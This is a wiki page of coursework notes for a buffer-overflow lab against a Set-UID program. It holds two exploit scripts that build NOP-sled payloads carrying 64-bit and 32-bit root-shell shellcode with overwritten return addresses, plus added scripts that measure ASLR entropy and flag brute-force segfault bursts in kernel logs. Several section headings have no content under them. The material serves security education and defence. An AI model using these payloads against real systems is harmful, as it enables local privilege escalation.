LAB ‐11 ‐ Buffer‐Overflow Attack Lab (Set‐UID Version) - archie-archana/securecodinglab GitHub Wiki
2.1 Turning Off Countermeasures
Address randomization - systems use address space layout randomization (ASLR) to randomize the starting addresses of the heap and the stack. This makes guessing exact addresses difficult, and guessing the address of the injected code is one of the critical steps of a buffer-overflow attack. The lab therefore turns this countermeasure off before the attack tasks and deals with it separately in Task 8.
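To see for yourself what the countermeasure does before turning it off, the following script (an added example for this page, not one of the lab's own files) spawns a fresh process a number of times, records one address from each run (the start of the `[stack]` mapping from `/proc/self/maps`, or a heap buffer address where `/proc` is unavailable), and counts how many address bits actually change between runs. With randomization disabled every run lands at the same address and the count is 0. The child program, the function names and the 20-run default are this example's own choices.

```python
#!/usr/bin/python3
"""Audit how much address-space randomization a system actually gives.

Added example for this wiki page, not one of the lab's files.  It spawns
fresh child processes, records one address from each, and counts how many
bits of that address change between runs; with randomization turned off
(as the lab does) the count is 0 and every run lands at the same address.
"""
import subprocess
import sys
from typing import List, Optional

# Child program (constructed here): print the start of the process's [stack]
# mapping from /proc/self/maps, or, off Linux, the address of a heap buffer.
CHILD_PROGRAM = r"""
import ctypes
try:
    with open('/proc/self/maps') as f:
        line = next(l for l in f if l.rstrip().endswith('[stack]'))
    print(int(line.split('-')[0], 16))
except (OSError, StopIteration):
    print(ctypes.addressof(ctypes.c_int(0)))
"""


def varying_bits(addresses: List[int]) -> int:
    """Bitmask of the address bits that differ across the samples."""
    if not addresses:
        return 0
    base = addresses[0]
    mask = 0
    for addr in addresses[1:]:
        mask |= addr ^ base
    return mask


def entropy_bits(addresses: List[int]) -> int:
    """Lower bound on randomization entropy: number of bits seen to vary."""
    return bin(varying_bits(addresses)).count("1")


def search_space(bits: int) -> int:
    """Number of candidate addresses an attacker would have to try."""
    return 1 << bits


def randomize_va_space() -> Optional[int]:
    """Current kernel setting, or None when the file is not readable."""
    try:
        with open("/proc/sys/kernel/randomize_va_space") as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def describe_mode(value: Optional[int]) -> str:
    """Human-readable meaning of the randomize_va_space value."""
    if value == 0:
        return "disabled: no randomization"
    if value == 1:
        return "partial: stack, mmap and vDSO randomized, heap (brk) is not"
    if value == 2:
        return "full: stack, mmap, vDSO and heap randomized"
    return "unknown: /proc/sys/kernel/randomize_va_space not readable"


def sample_addresses(runs: int = 20) -> List[int]:
    """Run the child program `runs` times and collect one address per run."""
    samples = []
    for _ in range(runs):
        result = subprocess.run([sys.executable, "-c", CHILD_PROGRAM],
                                capture_output=True, text=True, check=True)
        samples.append(int(result.stdout.strip()))
    return samples


if __name__ == "__main__":
    print("randomize_va_space:", describe_mode(randomize_va_space()))
    addrs = sample_addresses()
    bits = entropy_bits(addrs)
    print(f"sampled {len(addrs)} runs, first address {addrs[0]:#x}")
    print(f"at least {bits} bits vary -> search space >= {search_space(bits):,}")
```

The bit count is a lower bound: a bit that happens not to flip in 20 runs is not counted, so more runs give a tighter estimate. Running it once with `randomize_va_space` at 2 and once at 0 shows directly why the lab disables the countermeasure before Tasks 3 to 7.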
Task 3: Launching Attack on 32-bit Program
5.1 Investigation
**First breakpoint**
5.2 Launching Attacks
Task 4: Launching Attack without Knowing Buffer Size (Level 2)
## Task 5:
```python
#!/usr/bin/python3
import sys

# Replace this with the actual shellcode
shellcode = (
    b"\x90\x90\x90\x90" +
    b"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
    b"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
    b"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"
)
# replace with your shellcode

# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))

# Put the shellcode somewhere in the payload
start = 100  # Adjust this to the desired position in the payload
content[start:start + len(shellcode)] = shellcode

# Decide the return address value and put it somewhere in the payload
ret = 0x7fffffffd8c0  # Replace with the actual target return address
offset = 216          # Adjust this to the desired offset within the payload
L = 8                 # Use 4 for 32-bit address and 8 for 64-bit address

# Convert the return address to bytes and write it to the payload
content[offset:offset + L] = ret.to_bytes(L, byteorder='little')

# Print the payload
sys.stdout.buffer.write(content)
```
TASK-07
Defeating dash's Countermeasure

```python
#!/usr/bin/python3
import sys

# Replace the content with the actual shellcode
shellcode = (
    "\x31\xdb\x31\xc0\xb0\xd5\xcd\x80"
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
    "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
    "\xd2\x31\xc0\xb0\x0b\xcd\x80"
).encode('latin-1')

# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))

##################################################################
# Put the shellcode somewhere in the payload
start = 400  # Change this number
content[start:start + len(shellcode)] = shellcode

# Decide the return address value
# and put it somewhere in the payload
ret = 0xffffcab8 + 200  # Change this number
offset = 112            # Change this number

L = 4  # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L, byteorder='little')
##################################################################

# Write the content to a file
with open('badfile', 'wb') as f:
    f.write(content)
```
TASK-8
Defeating Address Randomization

On 32-bit Linux machines, stacks only have 19 bits of entropy, which means the stack base address can take 2^19 = 524,288 possible values. This number is not that high and can be exhausted easily with a brute-force approach: the attack is simply run again and again until the guessed return address happens to be right.
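The flip side of that brute-force approach is that every wrong guess crashes the target, so a Set-UID program dying hundreds of times in a few seconds is a loud signal. The following script (an added example for this page, not part of the lab) parses kernel segfault messages and reports any program with a burst of crashes inside a time window. The log lines are constructed in the style of the kernel's `segfault at ... ip ... sp ... error ...` messages, the program name `vuln_suid` is a placeholder, and the 10-second window and threshold of 5 are this example's own defaults.

```python
#!/usr/bin/python3
"""Flag bursts of segfaults in one program, the trace that brute-forcing
a randomized return address leaves in the kernel log.

Added example for this wiki page, not part of the lab.  The log lines are
constructed in the style of the kernel's segfault messages; the program
name vuln_suid is a placeholder.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Matches e.g. "kernel: [  100.000] vuln_suid[2001]: segfault at ffffc1b8 ..."
SEGFAULT_RE = re.compile(
    r"kernel: \[\s*(?P<uptime>\d+\.\d+)\] "
    r"(?P<prog>[^\[\s]+)\[(?P<pid>\d+)\]: segfault at (?P<addr>[0-9a-f]+)"
)


@dataclass
class Segfault:
    uptime: float  # seconds since boot, as printed by the kernel
    prog: str
    pid: int
    addr: int


@dataclass
class Burst:
    prog: str
    count: int
    first: float
    last: float


def parse_segfault(line: str) -> Optional[Segfault]:
    """Return a Segfault for a kernel segfault line, None for anything else."""
    m = SEGFAULT_RE.search(line)
    if not m:
        return None
    return Segfault(float(m["uptime"]), m["prog"], int(m["pid"]), int(m["addr"], 16))


def find_bursts(events: Iterable[Segfault], window_s: float = 10.0,
                threshold: int = 5) -> List[Burst]:
    """Per program, find the densest window of crashes; report it if it
    holds at least `threshold` crashes."""
    by_prog: Dict[str, List[Segfault]] = {}
    for e in events:
        by_prog.setdefault(e.prog, []).append(e)
    bursts: List[Burst] = []
    for prog, evs in by_prog.items():
        evs.sort(key=lambda e: e.uptime)
        best: Optional[Burst] = None
        left = 0
        for right, ev in enumerate(evs):
            # Slide the left edge until the window is at most window_s wide.
            while ev.uptime - evs[left].uptime > window_s:
                left += 1
            n = right - left + 1
            if best is None or n > best.count:
                best = Burst(prog, n, evs[left].uptime, ev.uptime)
        if best is not None and best.count >= threshold:
            bursts.append(best)
    return bursts


def scan(lines: Iterable[str], window_s: float = 10.0, threshold: int = 5) -> List[Burst]:
    """Parse raw log lines and return the detected crash bursts."""
    events = [e for e in map(parse_segfault, lines) if e is not None]
    return find_bursts(events, window_s, threshold)


# Constructed sample log: six crashes of the placeholder Set-UID program in
# two seconds, one unrelated crash, and one line that is not a segfault.
SAMPLE_LOG = [
    "Mar  3 10:15:01 vm kernel: [  100.000] vuln_suid[2001]: segfault at ffffc1b8 ip ffffc1b8 sp ffffca80 error 14",
    "Mar  3 10:15:01 vm kernel: [  100.400] vuln_suid[2002]: segfault at ffffc2b8 ip ffffc2b8 sp ffffd180 error 14",
    "Mar  3 10:15:02 vm kernel: [  100.800] vuln_suid[2003]: segfault at ffffc3b8 ip ffffc3b8 sp ffffb980 error 14",
    "Mar  3 10:15:02 vm kernel: [  101.200] vuln_suid[2004]: segfault at ffffc4b8 ip ffffc4b8 sp ffffce80 error 14",
    "Mar  3 10:15:02 vm kernel: [  101.600] vuln_suid[2005]: segfault at ffffc5b8 ip ffffc5b8 sp ffffc080 error 14",
    "Mar  3 10:15:03 vm kernel: [  102.000] vuln_suid[2006]: segfault at ffffc6b8 ip ffffc6b8 sp ffffd580 error 14",
    "Mar  3 10:15:06 vm kernel: [  105.000] firefox[1400]: segfault at 0 ip b7e2a1c0 sp bfa3e0f0 error 4",
    "Mar  3 10:15:09 vm sshd[900]: Accepted publickey for user from 10.0.0.5",
]

if __name__ == "__main__":
    for b in scan(SAMPLE_LOG):
        print(f"{b.prog}: {b.count} segfaults between uptime {b.first:.1f}s and {b.last:.1f}s")
```

On a real host the same functions can be fed the output of `dmesg` or `journalctl -k`; the one-crash `firefox` line shows that the window and threshold keep ordinary crashes below the alert level.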